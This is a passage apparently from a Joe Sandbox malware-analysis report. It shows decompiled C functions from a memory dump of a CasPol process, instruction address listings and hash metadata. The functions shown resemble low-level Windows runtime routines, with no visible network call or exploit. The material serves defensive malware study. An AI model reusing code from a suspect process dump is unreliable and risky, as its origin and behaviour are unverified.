								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                        0x013b52a5
                                                                        0x013b52ad
                                                                        0x013b52b0
                                                                        0x013b52b3
                                                                        0x013b52b7
                                                                        0x013b52ba
                                                                        0x013b52bf
                                                                        0x013b52c4
                                                                        0x013b52cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b52ce
                                                                        0x013b52d9
                                                                        0x013b52dd
                                                                        0x013b52e7
                                                                        0x013b52f7
                                                                        0x013b52f9
                                                                        0x013b52fd
                                                                        0x01410dcf
                                                                        0x01410dd5
                                                                        0x01410dd6
                                                                        0x01410dd7
                                                                        0x01410dd8
                                                                        0x01410dd9
                                                                        0x01410dde
                                                                        0x01410ddf
                                                                        0x01410de0
                                                                        0x01410de1
                                                                        0x01410de2
                                                                        0x01410de5
                                                                        0x01410dea
                                                                        0x01410dec
                                                                        0x01410f60
                                                                        0x01410f64
                                                                        0x01410f70
                                                                        0x01410f76
                                                                        0x01410f79
                                                                        0x01410f79
                                                                        0x00000000
                                                                        0x01410f64
                                                                        0x01410df2
                                                                        0x01410df7
                                                                        0x01410e04
                                                                        0x01410e0d
                                                                        0x01410e0d
                                                                        0x01410e10
                                                                        0x01410e1a
                                                                        0x01410e1c
                                                                        0x01410e4c
                                                                        0x01410e52
                                                                        0x01410e61
                                                                        0x01410e67
                                                                        0x01410e6b
                                                                        0x01410e70
                                                                        0x01410e76
                                                                        0x01410ed7
                                                                        0x01410edc
                                                                        0x01410ee0
                                                                        0x01410ee6
                                                                        0x01410eea
                                                                        0x01410eed
                                                                        0x01410ef0
                                                                        0x01410ef3
                                                                        0x01410ef6
                                                                        0x01410ef9
                                                                        0x01410efe
                                                                        0x01410f01
                                                                        0x01410f01
                                                                        0x01410f0b
                                                                        0x01410f12
                                                                        0x01410f16
                                                                        0x01410f18
                                                                        0x01410f1b
                                                                        0x01410f2c
                                                                        0x01410f31
                                                                        0x01410f31
                                                                        0x01410f35
                                                                        0x01410f39
                                                                        0x01410f3a
                                                                        0x01410f3c
                                                                        0x01410f3f
                                                                        0x01410f50
                                                                        0x01410f55
                                                                        0x01410f55
                                                                        0x01410f59
                                                                        0x013b52eb
                                                                        0x013b52f1
                                                                        0x013b52f1
                                                                        0x01410e7d
                                                                        0x01410e84
                                                                        0x01410e88
                                                                        0x01410e8a
                                                                        0x01410e8d
                                                                        0x01410e9e
                                                                        0x01410ea3
                                                                        0x01410ea3
                                                                        0x01410ea7
                                                                        0x01410eaf
                                                                        0x01410eb3
                                                                        0x01410eb9
                                                                        0x01410eb9
                                                                        0x01410ebc
                                                                        0x01410ecd
                                                                        0x01410ecd
                                                                        0x00000000
                                                                        0x01410eb3
                                                                        0x01410e21
                                                                        0x01410e2b
                                                                        0x01410e2f
                                                                        0x01410e30
                                                                        0x01410e3a
                                                                        0x01410e3f
                                                                        0x01410e41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01410e47
                                                                        0x00000000
                                                                        0x01410e47
                                                                        0x01410df9
                                                                        0x01410dfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01410dfe
                                                                        0x013b5303
                                                                        0x013b5307
                                                                        0x00000000
                                                                        0x013b5309
                                                                        0x00000000
                                                                        0x013b5309
                                                                        0x013b5307
                                                                        0x013b52e9
                                                                        0x013b52e9
                                                                        0x00000000
                                                                        0x013b52e9
                                                                        0x013b530e
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cd21b2ebe3695c38e62fb08a0307e2f13448bc53a3300883ff2db2d6bed5a89
                                                                        • Instruction ID: d893d141877ab09d74e9985ec0d12f2ebf96575d05c37024a8c6ee918a445e83
                                                                        • Opcode Fuzzy Hash: 8cd21b2ebe3695c38e62fb08a0307e2f13448bc53a3300883ff2db2d6bed5a89
                                                                        • Instruction Fuzzy Hash: 3C51F0311453429FD321DF68C841B67BBE8FF64718F14091EF59987A61E770E845CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E2AE4 Relevance: .2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x14a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x14a8208; // 0x14a8207
				_t8 = _t57 + 0x14a8208; // 0x14a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x14a8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x14a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x14a6d5c; // 0x7fe60654
							_t72 =  *0x14a6d5c; // 0x7fe60654
							_t75 =  *0x14a6d5c; // 0x7fe60654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x14a6d5c; // 0x7fe60654
							_t84 =  *0x14a6d5c; // 0x7fe60654
							_t87 =  *0x14a6d5c; // 0x7fe60654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E013FF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                        0x013e2ae4
                                                                        0x013e2aec
                                                                        0x013e2aef
                                                                        0x013e2af4
                                                                        0x013e2af7
                                                                        0x013e2afd
                                                                        0x013e2b92
                                                                        0x013e2b92
                                                                        0x013e2b97
                                                                        0x013e2b9c
                                                                        0x013e2b9c
                                                                        0x013e2b03
                                                                        0x013e2b06
                                                                        0x013e2b09
                                                                        0x013e2b09
                                                                        0x013e2b0f
                                                                        0x013e2b15
                                                                        0x013e2b15
                                                                        0x013e2b1b
                                                                        0x013e2b1e
                                                                        0x013e2b21
                                                                        0x013e2b26
                                                                        0x013e2b29
                                                                        0x013e2b81
                                                                        0x013e2b84
                                                                        0x013e2c0e
                                                                        0x013e2c15
                                                                        0x013e2c24
                                                                        0x013e2c24
                                                                        0x013e2b8a
                                                                        0x013e2b8a
                                                                        0x013e2b8a
                                                                        0x013e2b8a
                                                                        0x013e2b90
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2b4a
                                                                        0x013e2b4a
                                                                        0x013e2b4d
                                                                        0x013e2b53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2b55
                                                                        0x013e2b58
                                                                        0x013e2bb7
                                                                        0x01425d1b
                                                                        0x01425d37
                                                                        0x01425d47
                                                                        0x01425d53
                                                                        0x013e2bbd
                                                                        0x013e2bbd
                                                                        0x013e2bbd
                                                                        0x013e2bb7
                                                                        0x013e2b5d
                                                                        0x013e2c2f
                                                                        0x01425d5b
                                                                        0x01425d77
                                                                        0x01425d87
                                                                        0x01425d93
                                                                        0x013e2c35
                                                                        0x013e2c35
                                                                        0x013e2c35
                                                                        0x013e2c2f
                                                                        0x013e2b65
                                                                        0x013e2b9f
                                                                        0x013e2ba2
                                                                        0x013e2b67
                                                                        0x013e2b67
                                                                        0x013e2b69
                                                                        0x013e2b6b
                                                                        0x013e2b6e
                                                                        0x013e2bc9
                                                                        0x013e2bcc
                                                                        0x013e2bcf
                                                                        0x013e2bd4
                                                                        0x013e2bd6
                                                                        0x013e2bd6
                                                                        0x013e2bdb
                                                                        0x013e2c02
                                                                        0x013e2c05
                                                                        0x013e2c07
                                                                        0x00000000
                                                                        0x013e2c07
                                                                        0x013e2be0
                                                                        0x013e2c00
                                                                        0x013e2c3f
                                                                        0x013e2c3f
                                                                        0x00000000
                                                                        0x013e2c00
                                                                        0x013e2be5
                                                                        0x013e2be7
                                                                        0x013e2bec
                                                                        0x013e2bf4
                                                                        0x013e2bf6
                                                                        0x00000000
                                                                        0x013e2bf6
                                                                        0x013e2b70
                                                                        0x013e2b76
                                                                        0x013e2b2b
                                                                        0x013e2b2b
                                                                        0x013e2b2d
                                                                        0x013e2b2f
                                                                        0x013e2b32
                                                                        0x013e2b35
                                                                        0x013e2b3a
                                                                        0x00000000
                                                                        0x013e2b40
                                                                        0x013e2b43
                                                                        0x013e2b45
                                                                        0x013e2b47
                                                                        0x013e2b4a
                                                                        0x013e2b4d
                                                                        0x013e2b53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2b53
                                                                        0x013e2b78
                                                                        0x013e2b78
                                                                        0x013e2b7b
                                                                        0x013e2b7e
                                                                        0x00000000
                                                                        0x013e2b7e
                                                                        0x013e2b76
                                                                        0x013e2ba5
                                                                        0x013e2ba5
                                                                        0x013e2ba8
                                                                        0x013e2bad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2baf
                                                                        0x013e2baf
                                                                        0x013e2bc2
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7d053fb0674bebda1f0f1856bb8c86dcc5ecdae020005c228c9bae81a2e02f2
                                                                        • Instruction ID: bfa95cb3bd8f12b83ba1d25a43c242d5cc2530bbe532b1b86a458fdf0ffb9ed1
                                                                        • Opcode Fuzzy Hash: b7d053fb0674bebda1f0f1856bb8c86dcc5ecdae020005c228c9bae81a2e02f2
                                                                        • Instruction Fuzzy Hash: FF51B676A002268FCF14CF1DC4849BEB7F9FB8870471A845AE8469B7A5D730AE51C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147AE44 Relevance: .2, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0147AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0147C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0147ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0147FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0147EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E013D7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01471608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01481536(0x14a8ae4, (_t74 -  *0x14a8b04 >> 0x14) + (_t74 -  *0x14a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0147C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0147A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0145CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0147ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                        0x0147ae44
                                                                        0x0147ae4c
                                                                        0x0147ae53
                                                                        0x0147ae55
                                                                        0x0147ae5c
                                                                        0x0147ae64
                                                                        0x0147ae68
                                                                        0x0147ae75
                                                                        0x0147ae75
                                                                        0x0147ae78
                                                                        0x0147ae7a
                                                                        0x0147ae7c
                                                                        0x0147ae7f
                                                                        0x0147aea8
                                                                        0x0147aeab
                                                                        0x0147aead
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147aeb3
                                                                        0x0147aeb8
                                                                        0x0147aebb
                                                                        0x0147aebd
                                                                        0x00000000
                                                                        0x0147ae81
                                                                        0x0147ae88
                                                                        0x0147ae8f
                                                                        0x0147ae9b
                                                                        0x0147ae96
                                                                        0x0147ae96
                                                                        0x0147ae96
                                                                        0x0147aea0
                                                                        0x0147aea3
                                                                        0x0147aebf
                                                                        0x0147aebf
                                                                        0x0147aec3
                                                                        0x0147aec9
                                                                        0x0147af0d
                                                                        0x0147af14
                                                                        0x0147af3d
                                                                        0x0147af3d
                                                                        0x0147af41
                                                                        0x0147af44
                                                                        0x0147af67
                                                                        0x0147af67
                                                                        0x0147af6a
                                                                        0x0147afca
                                                                        0x0147afd1
                                                                        0x00000000
                                                                        0x0147afd1
                                                                        0x0147af6c
                                                                        0x0147af6d
                                                                        0x0147af75
                                                                        0x0147af7c
                                                                        0x0147af7e
                                                                        0x0147af80
                                                                        0x0147af85
                                                                        0x0147af87
                                                                        0x0147af99
                                                                        0x0147af89
                                                                        0x0147af92
                                                                        0x0147af92
                                                                        0x0147af9e
                                                                        0x0147afa1
                                                                        0x0147afa3
                                                                        0x0147afa9
                                                                        0x0147afb0
                                                                        0x0147afb2
                                                                        0x0147afb4
                                                                        0x0147afbc
                                                                        0x0147afbc
                                                                        0x0147afb4
                                                                        0x0147afb0
                                                                        0x00000000
                                                                        0x0147afa1
                                                                        0x0147af4f
                                                                        0x0147af57
                                                                        0x0147af5c
                                                                        0x0147af5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147af60
                                                                        0x0147af64
                                                                        0x0147af64
                                                                        0x00000000
                                                                        0x0147af64
                                                                        0x0147af1a
                                                                        0x0147af25
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147af27
                                                                        0x0147af28
                                                                        0x0147af33
                                                                        0x00000000
                                                                        0x0147aed0
                                                                        0x0147aed0
                                                                        0x0147aed2
                                                                        0x0147aee1
                                                                        0x0147aee4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147aee6
                                                                        0x0147aeec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147aefb
                                                                        0x0147af07
                                                                        0x0147afd3
                                                                        0x0147afdb
                                                                        0x0147afdb
                                                                        0x00000000
                                                                        0x0147af07
                                                                        0x0147aed6
                                                                        0x0147aed8
                                                                        0x0147aedf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147aedf
                                                                        0x0147aec9

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b34bf70874931efde26c8a686953793e8baffe8224fe3edc770254ed31c6e859
                                                                        • Instruction ID: 811e884301c4e3bb303327f24ea51a34cf5437b4164b4cfec2681ca321c10587
                                                                        • Opcode Fuzzy Hash: b34bf70874931efde26c8a686953793e8baffe8224fe3edc770254ed31c6e859
                                                                        • Instruction Fuzzy Hash: 2841C4717052119BD72ADA2AC8A4BBFB799EF94620F2C461BF916873F0D734D801C691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DDBE9 Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E013DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E013BCC50(E013B4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E013D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01488ED6(_t102, _t98);
						}
						_t76 = _v44;
						E013D2280(_t58, _v44);
						E013DDD82(_v44, _t102, _t98);
						E013DB944(_t102, _v5);
						return E013CFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x14a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x14a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x14a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x14a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x147fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                        0x013ddbe9
                                                                        0x013ddbf2
                                                                        0x013ddbf7
                                                                        0x013ddbf9
                                                                        0x013ddbfc
                                                                        0x013ddc00
                                                                        0x013ddc03
                                                                        0x013ddc14
                                                                        0x013ddd54
                                                                        0x013ddd54
                                                                        0x013ddd54
                                                                        0x013ddc18
                                                                        0x013ddc1d
                                                                        0x013ddc1d
                                                                        0x013ddc32
                                                                        0x013ddc3b
                                                                        0x013ddc3e
                                                                        0x013ddc46
                                                                        0x013ddd5b
                                                                        0x013ddd62
                                                                        0x013ddd64
                                                                        0x013ddd67
                                                                        0x013ddd69
                                                                        0x013ddd6b
                                                                        0x013ddd6e
                                                                        0x013ddd70
                                                                        0x013ddd73
                                                                        0x013ddd73
                                                                        0x00000000
                                                                        0x013ddc4c
                                                                        0x013ddc4e
                                                                        0x01423ae3
                                                                        0x01423ae8
                                                                        0x01423aea
                                                                        0x013ddce7
                                                                        0x013ddce9
                                                                        0x013ddcec
                                                                        0x013ddcee
                                                                        0x013ddcf0
                                                                        0x013ddcf3
                                                                        0x013ddcf5
                                                                        0x01423af2
                                                                        0x01423af5
                                                                        0x01423af5
                                                                        0x013ddd06
                                                                        0x013ddd08
                                                                        0x013ddd0b
                                                                        0x013ddd12
                                                                        0x01423b08
                                                                        0x013ddd18
                                                                        0x013ddd18
                                                                        0x013ddd18
                                                                        0x013ddd20
                                                                        0x013ddd23
                                                                        0x01423b16
                                                                        0x01423b16
                                                                        0x013ddd29
                                                                        0x013ddd2d
                                                                        0x013ddd36
                                                                        0x013ddd40
                                                                        0x013ddd51
                                                                        0x013ddd51
                                                                        0x013ddc54
                                                                        0x013ddc59
                                                                        0x013ddc59
                                                                        0x013ddc5e
                                                                        0x013ddc5e
                                                                        0x013ddc63
                                                                        0x013ddc66
                                                                        0x013ddc6b
                                                                        0x013ddc78
                                                                        0x013ddc7b
                                                                        0x013ddc81
                                                                        0x013ddc81
                                                                        0x013ddc83
                                                                        0x013ddc89
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ddd7b
                                                                        0x013ddd7b
                                                                        0x013ddc8f
                                                                        0x013ddc8f
                                                                        0x013ddc92
                                                                        0x013ddc99
                                                                        0x013ddc9f
                                                                        0x013ddca5
                                                                        0x013ddcaa
                                                                        0x013ddcaa
                                                                        0x013ddcb3
                                                                        0x013ddcb8
                                                                        0x013ddcbb
                                                                        0x013ddcc1
                                                                        0x013ddccf
                                                                        0x013ddcd2
                                                                        0x013ddcd5
                                                                        0x013ddcd7
                                                                        0x013ddcda
                                                                        0x013ddcdc
                                                                        0x013ddcdc
                                                                        0x013ddce2
                                                                        0x013ddce4
                                                                        0x00000000
                                                                        0x013ddce4

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b7b7abe791fa1eb3c675da8750a6b5a595f8f9d95ff43b62d0a6ce3ed402fa9
                                                                        • Instruction ID: 1337c3f071fbd2700741910909d33a7fcce0c20507b1dac2cdbcc76cde74e52f
                                                                        • Opcode Fuzzy Hash: 6b7b7abe791fa1eb3c675da8750a6b5a595f8f9d95ff43b62d0a6ce3ed402fa9
                                                                        • Instruction Fuzzy Hash: 4B51AC72A00216CFCF14CFACD480AAEBBF5BF48314F25815AD559AB384EB70A944CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CEF40 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E013CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
